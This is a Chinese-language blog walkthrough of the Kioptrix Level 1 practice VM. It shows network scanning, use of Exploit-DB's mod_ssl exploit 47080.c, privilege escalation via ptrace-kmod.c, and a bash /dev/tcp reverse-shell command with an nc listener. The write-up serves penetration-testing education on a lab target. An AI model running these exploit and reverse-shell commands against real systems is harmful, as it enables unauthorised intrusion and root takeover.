Kioptrix Level 1(Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4)

Man_Y發表於2024-06-25

準備活動

靶場搭建請自行百度

修改vmx檔案其中一條引數如下,使其網路連線變成nat,開啟靶機時要時刻確保網路為nat

ethernet0.networkName = "nat"

正式開始

利用Apache低版本漏洞(Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4)

開啟kali,檢視當前ip(ifconfig),kali ip為192.168.217.128

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.217.128  netmask 255.255.255.0  broadcast 192.168.217.255
        inet6 fe80::20c:29ff:fe96:9dd7  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:96:9d:d7  txqueuelen 1000  (Ethernet)
        RX packets 1388089  bytes 911013407 (868.8 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1138957  bytes 68486094 (65.3 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 4  bytes 240 (240.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4  bytes 240 (240.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

使用nmap掃存活主機,發現129這個主機

nmap -sP 192.168.217.0/24

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-24 18:13 CST
Nmap scan report for 192.168.217.2 (192.168.217.2)
Host is up (0.0028s latency).
Nmap scan report for 192.168.217.128 (192.168.217.128)
Host is up (0.00019s latency).
Nmap scan report for 192.168.217.129 (192.168.217.129)
Host is up (0.0013s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.35 seconds

或者使用netdiscover

netdiscover -i eth0 -r 192.168.217.0/24
-i:網路卡
-r:網段

 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                     8 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 480                                                                                                                                 
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.217.1   00:50:56:c0:00:08      5     300  VMware, Inc.                                                                                                                                  
 192.168.217.2   00:50:56:ed:47:4d      1      60  VMware, Inc.                                                                                                                                  
 192.168.217.129 00:0c:29:f9:00:af      1      60  VMware, Inc.                                                                                                                                  
 192.168.217.254 00:50:56:f7:3a:e5      1      60  VMware, Inc. 

或者arp-scan

arp-scan -l

Interface: eth0, type: EN10MB, MAC: 00:0c:29:96:9d:d7, IPv4: 192.168.217.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.217.1   00:50:56:c0:00:08       VMware, Inc.
192.168.217.2   00:50:56:ed:47:4d       VMware, Inc.
192.168.217.129 00:0c:29:f9:00:af       VMware, Inc.
192.168.217.254 00:50:56:f7:3a:e5       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.111 seconds (121.27 hosts/sec). 4 responded

探測全埠開放情況

nmap -p- 192.168.217.129

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-24 18:21 CST
Nmap scan report for 192.168.217.129 (192.168.217.129)
Host is up (0.0019s latency).
Not shown: 65529 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
1024/tcp open  kdm

發現開放了80埠,訪問一下web頁面,發現是一個測試頁面

思路:檢視網頁有沒有相關漏洞,掃一下目錄結構

image

dirsearch -u http://192.168.217.129

image

分別訪問一下,但是沒找到可利用的點

image

image

服務詳細掃描

nmap -sV -A 192.168.217.129

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-24 18:28 CST
Nmap scan report for 192.168.217.129 (192.168.217.129)
Host is up (0.0019s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1024/tcp   status
|_  100024  1           1024/udp   status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
|_http-title: 400 Bad Request
|_ssl-date: 2024-06-24T10:31:15+00:00; +1m52s from scanner time.
1024/tcp open  status      1 (RPC #100024)

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: 1m51s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.81 seconds

思路:看到服務後面對應的版本,可以在msf裡面找找有沒有相關的漏洞可以利用

Apache版本現在最新版本已經是2.4.xx了,但是這裡版本較低,可以檢視一下低版本有沒有相關漏洞

searchsploit mod_ssl

關於searchspolit(“searchsploit”是一個用於Exploit-DB的命令列搜尋工具,它還允許你隨身帶一份Exploit-DB的副本。)
searchsploit漏洞查詢工具使用指南(exploit-db.com 離線工具 exploitdb)_searchsploit安裝-CSDN部落格

image

可以去Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers檢視一下最新漏洞

image

locate命令主要是用來查詢檔案的,但它的速度比find命令快很多。因為它不是按路徑進行搜尋的,而是去搜尋一個資料庫,即/var/lib/mlocate/mlocate.db。這個資料庫中含有本地所有檔案資訊,Linux系統自動建立這個資料庫,並且每天自動更新一次

檢視當前檔案在哪
locate unix/remote/47080.c

/usr/share/exploitdb/exploits/unix/remote/47080.c

將此檔案複製到桌面上

檢視當前路徑
pwd

/home/kali/Desktop


cp /usr/share/exploitdb/exploits/unix/remote/47080.c /home/kali/Desktop

image

檢視一下這個檔案

vim 47080.c

image

apt-get install libssl-dev

gcc -o 47080 47080.c -lcrypto

這裡的47080是我隨便取得,編譯後的檔名
47080.c是桌面之前的exp

image

執行編譯後的指令碼,檢視使用方法

image

target是我們選擇下面的版本,比如0x6a,box也就是目標的ip地址,埠號可跟可不跟

由上面服務詳細資訊我們得知Apache版本為1.3.20
【Apache/1.3.20 (Unix) (Red-Hat/Linux)】

根據版本可供我們選擇的就只有這兩種

image

構造exp進行連線

./47080 0x6a 192.168.217.129 443 -c 40
失敗

./47080 0x6b 192.168.217.129 443 -c 40
成功

image

image

輸入whoami,返回的並不是root的許可權,問題在於檔案的其中有指令碼沒有被執行沒有起作用,複製未執行的檔名
image

開啟exp檔案檢視此檔案下載路徑

wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

image

成功下載到kali桌面

在kali開啟服務,讓目標機器從本地下載此檔案

python -m http.server 80

wget 192.168.217.128/ptrace-kmod.c

上傳並編譯
image

需要重新進行連線,相當於重新整理,成功拿到root許可權
image

反彈shell

kali本機開啟監聽
nc -lvvp 7777

在目標主機執行
bash -i >& /dev/tcp/192.168.217.128/7777 0>&1

image

涉及工具

  1. nmap
  2. netdiscover(掃存活主機)(使用netdiscover進行主動(被動)掃描
  3. arp-scan(掃存活主機)(kali arp-scan網路掃描工具 掃描區域網ip地址-CSDN部落格
  4. dirsearch(kali安裝dirsearch工具以及使用_kali dirsearch-CSDN部落格

相關文章